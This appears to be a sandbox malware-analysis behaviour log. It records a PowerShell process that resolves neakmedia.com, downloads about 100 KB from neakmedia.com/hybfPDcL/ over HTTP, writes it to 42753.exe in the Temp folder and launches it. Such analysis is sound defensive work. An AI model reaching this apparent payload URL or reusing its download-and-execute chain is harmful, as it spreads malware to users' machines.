Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4096 True 5
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 4018 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 78, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 4096 True 17
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 3022 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 50, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 281 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 4096 True 62
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 3895 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 201, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 4096 True 21
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 3687 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 409, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 2228 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 844, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 4096 True 4
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 3736 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 360, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 1459 True 1
Fn
Data
Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\Config\machine.config size = 4096, size_out = 0 True 1
Fn
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4096 True 3
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 8575 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4616 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 23232 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 45012 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4356 True 1
Fn
Data
Write C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Temp\42753.exe size = 4321 True 1
Fn
Data
Registry (211)
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment True 1
Fn
Open Key HKEY_CURRENT_USER\Environment True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 9
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell False 4
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine True 2
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance True 1
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance True 1
Open Key HKEY_CURRENT_USER True 1
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 4
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 9
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4160, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog True 1
Process (2)
Operation Process Additional Information Success Count
Create C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe show_window = SW_SHOWNORMAL True 1
Get Info type = PROCESS_BASIC_INFORMATION True 1
Module (5)
Operation Module Additional Information Success Count
Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 2048 True 1
Get Filename process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\pOwerSheLL.exe, size = 260 True 2
Create Mapping filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Map process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE True 1
System (9)
Operation Additional Information Success Count
Get Computer Name result_out = F71GWAT True 1
Get Info type = Operating System False 6
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Get Info type = Hardware Information True 1
Mutex (33)
Operation Additional Information Success Count
Create mutex_name = Global\.net clr networking True 10
Create mutex_name = Global\.net clr networking False 1
Create mutex_name = Global\.net clr networking True 5
Open mutex_name = Global\.net clr networking, desired_access = MUTEX_MODIFY_STATE, SYNCHRONIZE True 1
Release mutex_name = Global\.net clr networking True 1
Release mutex_name = Global\.net clr networking True 10
Release mutex_name = Global\.net clr networking True 5
Environment (122)
Operation Additional Information Success Count
Get Environment String name = MshEnableTrace False 114
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Get Environment String name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR True 1
Get Environment String name = HomeDrive, result_out = C: True 1
Get Environment String name = HomePath, result_out = \Users\BGC6u8Oy yXGxkR True 1
Get Environment String name = temp, result_out = C:\Users\BGC6U8~1\AppData\Local\Temp True 2
Set Environment String name = PSMODULEPATH, value = C:\Users\BGC6u8Oy yXGxkR\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Network Behavior
DNS (1)
Operation Additional Information Success Count
Resolve Name host = neakmedia.com, address_out = 70.39.145.109, service = 0 True 1
TCP Sessions (1)
Information Value
Total Data Sent 0.07 KB (72 bytes)
Total Data Received 100.39 KB (102804 bytes)
Contacted Host Count 1
Contacted Hosts 70.39.145.109:80
TCP Session #1
Information Value
Handle 0x530
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 70.39.145.109
Remote Port 80
Local Address 0.0.0.0
Local Port 1728
Data Sent 0.07 KB (72 bytes)
Data Received 100.39 KB (102804 bytes)
Operations
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 70.39.145.109, remote_port = 80 True 1
Send flags = NO_FLAG_SET, size = 72, size_out = 72 True 1
Receive flags = NO_FLAG_SET, size = 4096, size_out = 4096 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 8972 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 3752 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 4960 True 1
Receive flags = NO_FLAG_SET, size = 65536, size_out = 23232 True 1
Receive flags = NO_FLAG_SET, size = 57785, size_out = 45012 True 1
Receive flags = NO_FLAG_SET, size = 12773, size_out = 4356 True 1
Receive flags = NO_FLAG_SET, size = 8417, size_out = 1452 True 1
Receive flags = NO_FLAG_SET, size = 6965, size_out = 6965 True 1
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Receive flags = NO_FLAG_SET, size = 1, size_out = 1 True 3
Receive flags = NO_FLAG_SET, size = 2, size_out = 2 True 1
Close type = SOCK_STREAM True 1
HTTP Sessions (1)
Information Value
Total Data Sent 0.07 KB (72 bytes)
Total Data Received 100.39 KB (102804 bytes)
Contacted Host Count 1
Contacted Hosts neakmedia.com
HTTP Session #1
Information Value
Server Name neakmedia.com
Server Port 80
Data Sent 0.07 KB (72 bytes)
Data Received 100.39 KB (102804 bytes)
Operations
Operation Additional Information Success Count
Open Session access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS True 1
Open Connection protocol = http, server_name = neakmedia.com, server_port = 80 True 1
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /hybfPDcL/ True 1
Send HTTP Request headers = host: neakmedia.com, connection: Keep-Alive, url = neakmedia.com/hybfPDcL/ True 1
Read Response size = 4096, size_out = 4096 True 1
Read Response size = 65536, size_out = 8972 True 1
Read Response size = 65536, size_out = 3752 True 1
Read Response size = 65536, size_out = 4960 True 1
Read Response size = 65536, size_out = 23232 True 1
Read Response size = 57785, size_out = 45012 True 1
Read Response size = 12773, size_out = 4356 True 1
Read Response size = 8417, size_out = 1452 True 1
Read Response size = 6965, size_out = 6965 True 1
Read Response size = 2, size_out = 2 True 1
Read Response size = 1, size_out = 1 True 3
Read Response size = 2, size_out = 2 True 1
Close Session True 1
Process #3: 42753.exe
(Host: 566, Network: 0)
Information Value
ID #3
File Name c:\users\bgc6u8~1\appdata\local\temp\42753.exe
Command Line "C:\Users\BGC6U8~1\AppData\Local\Temp\42753.exe"
Initial Working Directory C:\Users\BGC6u8Oy yXGxkR\Desktop\
Monitor Start Time: 00:00:47, Reason: Child Process
Unmonitor End Time: 00:02:25, Reason: Terminated by Timeout
Monitor Duration 00:01:38
OS Process Information
Information Value
PID 0xad0
Parent PID 0xa68 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable False
Integrity Level Medium
Username F71GWAT\BGC6u8Oy yXGxkR
Groups
  • F71GWAT\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (USE_FOR_DENY_ONLY)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
